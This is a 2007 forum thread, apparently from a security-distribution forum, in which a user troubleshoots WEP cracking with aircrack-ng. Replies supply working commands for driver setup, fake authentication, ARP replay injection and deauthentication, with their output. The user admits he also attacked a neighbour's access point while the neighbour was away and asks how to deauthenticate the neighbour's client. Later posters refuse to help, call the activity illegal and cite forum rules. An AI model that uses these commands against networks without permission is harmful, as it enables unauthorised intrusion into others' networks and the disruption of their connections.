View Full Version : fakeauth problem with aircrack


silentkiller
11-23-2007, 10:50 PM
Hi All,
I use the ipwraw-ng 2.0.0 drivers. My channel is the same as my AP (iwconfig wifi0 channel 6). I set up my airodump-ng, works fine. When I try to fakeauth with the AP it says:
20:39:25 Waiting for beacon frame (BSSID: 00:18:39:xx:xx:xx)
20:39:25 Sending Authentication Request
20:39:25 Authentication successful
20:39:25 Sending Association Request
20:39:30 Sending Authentication Request
20:39:32 Sending Authentication Request
20:39:34 Sending Authentication Request
20:39:36 Sending Authentication Request

Attack was unsuccessful.
The authentication is always successful but it can't make an association.
I use this command:
./aireplay-ng -1 0 -b macoftheAP -h mymac wifi0

There is also something weird I notice
When I do ifconfig -a to show my own MAC address it says by wifi0:
00-19-D2-xx-xx-xx-00-00-00-00-00-00-00-00-00-00
So it shows my MAC address and then a lot of 0's. Don't know if that can be the problem.
I unload the original drivers by doing: modprobe -r ipw3945
I hope that's enough, I'm currently trying it on ubuntu because I got the same with backtrack but no difference.
In lsmod i don't see anything from ipw3945 anymore.
Maybe should I change my mac ? Is it necessary ?

Thanks in advance,
silentkiller

-=Xploitz=-
11-23-2007, 11:46 PM
Please update to the newest developmental version of the aircrack-ng suite. This solves most people's problems.

Aircrack's developmental version.
Code:
svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
cd aircrack-ng
gmake SQLITE=true
gmake SQLITE=true install

silentkiller
11-24-2007, 12:44 AM
Hi man,
Thx for your reply, i installed the latest version and ...:
23:06:02 Waiting for beacon frame (BSSID: 00:18:39:xx:xx:xx)

23:06:02 Sending Authentication Request
23:06:02 Authentication successful
23:06:02 Sending Association Request [ACK]

23:06:07 Sending Authentication Request

23:06:09 Sending Authentication Request

23:06:11 Sending Authentication Request
...

23:06:38 Sending Authentication Request
Attack was unsuccessful. Possible reasons:

It didn't help.
I already tried the network of the neighbours (just for testing) but it did the same ..

-=Xploitz=-
11-24-2007, 01:04 AM
aireplay-ng -1 0 -b macoftheAP -h mymac wifi0

should be ath0 not wifi0


Watch my videos in the tutorial section...especially the one that's stickied..and since you have an Atheros chipped card, follow my video to the "T". ;)

silentkiller
11-24-2007, 01:05 AM
As I said, I use the intel 3945abg chipset with the ipwraw drivers, so it is wifi0 ;)

-=Xploitz=-
11-24-2007, 01:07 AM
> As I said, I use the intel 3945abg chipset with the ipwraw drivers, so it is wifi0 ;)


OOOps!..Sorry!! I just saw the wifi0 and assumed Atheros. :o

But it couldn't hurt to watch the videos anyways.

If you watched them and followed...what are ALL of your commands from start to this error?? :confused::confused:

silentkiller
11-24-2007, 01:12 AM
hehe, i followed your videos already but i'll explain what i'll do (nice videos btw, will reply in the thread when I got my first WEP cracked ;))
so: i boot up, then:
modprobe -r ipw3945 (eth1 disappears)
modprobe ipwraw (wifi0 and ath0 show up)
then: ./airodump wifi0
I copy the bssid and write down the channel
iwconfig wifi0 channel 11 (it's a linksys router)
./airodump-ng -c 11 --bssid macap -w blabla wifi0
other window:
./aireplay-ng -1 0 -a macap -h mymac wifi0

And then: the error ;)

-=Xploitz=-
11-24-2007, 01:15 AM
> hehe, i followed your videos already but i'll explain what i'll do (nice videos btw, will reply in the thread when I got my first WEP cracked ;))
> so: i boot up, then:
> modprobe -r ipw3945 (eth1 disappears)
> modprobe ipwraw (wifi0 and ath0 show up)
> then: ./airodump wifi0
> I copy the bssid and write down the channel
> iwconfig wifi0 channel 11 (it's a linksys router)
> ./airodump-ng -c 11 --bssid macap -w blabla wifi0
> other window:
> ./aireplay-ng -1 0 -a macap -h mymac wifi0
>
> And then: the error ;)

Well, your commands appear to be correct. :)

How far away are you? Close? Far? 30 foot away??:confused: Etc...

-=Xploitz=-
11-24-2007, 01:16 AM
BTW...

Have you tried to add -e networksnamehere in your command....

aireplay-ng -1 0 -a macap -h mymac wifi0

and make it..

aireplay-ng -1 0 -e essidhere -a macap -h mymac wifi0

silentkiller
11-24-2007, 01:18 AM
from the neighbours, i wouldn't know
from my own router: it's almost near me, in windows i have a full signal bar so i think it should be something else.
I ordered a D-LINK DWL-G122 usb stick, maybe I can get it working with that, though, it should work with the intel chipset :)

PrairieFire
11-24-2007, 04:24 AM
> from the neighbours, i wouldn't know
> from my own router: it's almost near me, in windows i have a full signal bar so i think it should be something else.
> I ordered a D-LINK DWL-G122 usb stick, maybe I can get it working with that, though, it should work with the intel chipset :)

You failed to setup your card correctly thus it will not work.

What does the wiki (http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#IPW3945_2) state:

* Notice: After starting airodump-ng only run one command at a time.
If you do not your system may hang or freeze.

ifconfig wifi0 down
#Change to AP BSSID
nano /sys/class/net/wifi0/device/bssid
# Channel of AP
nano /sys/class/net/wifi0/device/channel
# Change from 108 to 2
nano /sys/class/net/wifi0/device/rate
ifconfig wifi0 up
airodump-ng rtap0
#wifi0 is used for all other commands.

silentkiller
11-24-2007, 11:52 AM
Thanks for the info man, it helped :):
10:11:02 Sending Authentication Request [ACK]
10:11:02 Authentication successful
10:11:02 Sending Association Request [ACK]
10:11:02 Association successful :-)

So that's nice
Next command:
./aireplay-ng -3 -b 00:90:96:xx:xx:xx -h 00-19-D2-xx-xx-xx -e SANTIS50-4CFFA8 wifi0
But then the data packets don't start raising:
Read 373 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(I also tried without the -e but doesn't help)

So what I did before:
ifconfig wifi0 down
nano /sys/class/net/wifi0/device/bssid => I replace the 00:00.. by the mac of the ap that i'm attacking

nano /sys/class/net/wifi0/device/channel => I change this to the channel of the AP i'm attacking

nano /sys/class/net/wifi0/device/rate => I change this from 108 to 2
Then: ifconfig wifi0 up

What I do notice: when i use this command: ifconfig wifi0 down, i still can see the wifi0 in the iwconfig, is this normal ?
If I want, I also can use airodump-ng with wifi0, even when it is down (or should be down)

For airodump I used: ./airodump-ng -e blablabla rtap0 (and the AP showed up)

pureh@te
11-24-2007, 02:23 PM
Is there a client connected? And if there is not, how long are you waiting for an ARP request?

silentkiller
11-24-2007, 02:35 PM
euh, I don't think there is a client connected because I see no data in airodump-ng. I also tried aireplay-ng with a --deauth and it says it should work better with the mac of the client. I searched the forum but can't find a tutorial for cracking wep with a client connected. I don't think there is a client connected, but if there is, how can I find his mac to deauth him ?

pureh@te
11-24-2007, 02:42 PM
So it's like your neighbor's AP and you're not sure if there are any other clients connected?

silentkiller
11-24-2007, 02:47 PM
Normally he's not at home in the weekends so i don't think he's connected. But even when I do aireplay-ng --deauth 0 -a 00:90:96:4C:FF:xx wifi0 it doesn't get an arp request

pureh@te
11-24-2007, 02:55 PM
I don't suppose you are aware that cracking AP's and stealing wifi is a crime in almost every country.

silentkiller
11-24-2007, 02:59 PM
I'm just trying to get my own ap cracked, of course I do know that, but if it doesn't work on my ap, i try it on another ap (neighbours). Then I know it's my fault and not the fault of the AP. I will not crack the password, just testing if the injecting works, but it doesn't work on both (mine and neighbours)

pureh@te
11-24-2007, 03:06 PM
Alright well maybe some other moron will help you but I do not feel comfortable helping you conduct your u833r l33t h4x0r illegal business. In fact I bet I know where this thread is going.

BTW just for anyone's info: As soon as you associate and authenticate with an access point you are BREAKING the LAW!!!

silentkiller
11-24-2007, 03:13 PM
I don't think you get it:
I'm making a work for my last year in school about wireless networks. I read WEP was easy to crack and I want to show it to my teachers that I was able to crack my own network. That's all.
But if you don't believe me, ok, no problem, I'm not going to make a fight about this ..

pureh@te
11-24-2007, 03:36 PM
I get it just fine. You admitted to using our distro for illegal activities and I do not want to help you.

silentkiller
11-24-2007, 03:51 PM
Ok then, no problem if you don't believe me

pureh@te
11-24-2007, 04:07 PM
It may shock you to know that people often misrepresent themselves on the internet.

silentkiller
11-24-2007, 04:29 PM
man, if you don't believe me, no problem then, but just drop it then
I really do know what you mean, I know the people that you mean but I'm not like that and if you don't believe me, no problem, but just drop it then.
And btw, why should I try to crack the network of the neighbours, I can't do anything with it :s

Re@lity
11-24-2007, 04:37 PM
> euh, I don't think there is a client connected because I see no data in airodump-ng. I also tried aireplay-ng with a --deauth and it says it should work better with the mac of the client. I searched the forum but can't find a tutorial for cracking wep with a client connected. I don't think there is a client connected, but if there is, how can I find his mac to deauth him ?

> Normally he's not at home in the weekends so i don't think he's connected. But even when I do aireplay-ng --deauth 0 -a 00:90:96:4C:FF:xx wifi0 it doesn't get an arp request

Perhaps you didn't read the forum rules.........

By registering with these forums you agree to be bound by the rules....
Particularly these 3 spring to mind:


We do not condone any illegal activity at all.
Do not post about breaking into networks that do not belong to you and for which you have no permissions.
Posts like - "Oooh! look!! I've cracked my neighbours wireless AP" or "How do I hack a network!?" are not needed here, thanks.

Re@lity
11-24-2007, 05:15 PM
Just gotta add this guy's response, via a PM to me.

Apparently, because he couldn't do this attack successfully on his own network, trying it out on another neighbour's network is fine, because it's just a test to confirm whether the original problem lies within his own network!?:rolleyes::confused:

He then goes on to say that this is akin to trying a suspect vga card in another pc, to confirm whether it's the vga card or the pc at fault!?

I pointed out that in this analogy, it would involve breaking into someone's house, while they are out, and testing your vga card in their pc with neither their knowledge nor express consent.
But I don't think he gets it..........:rolleyes: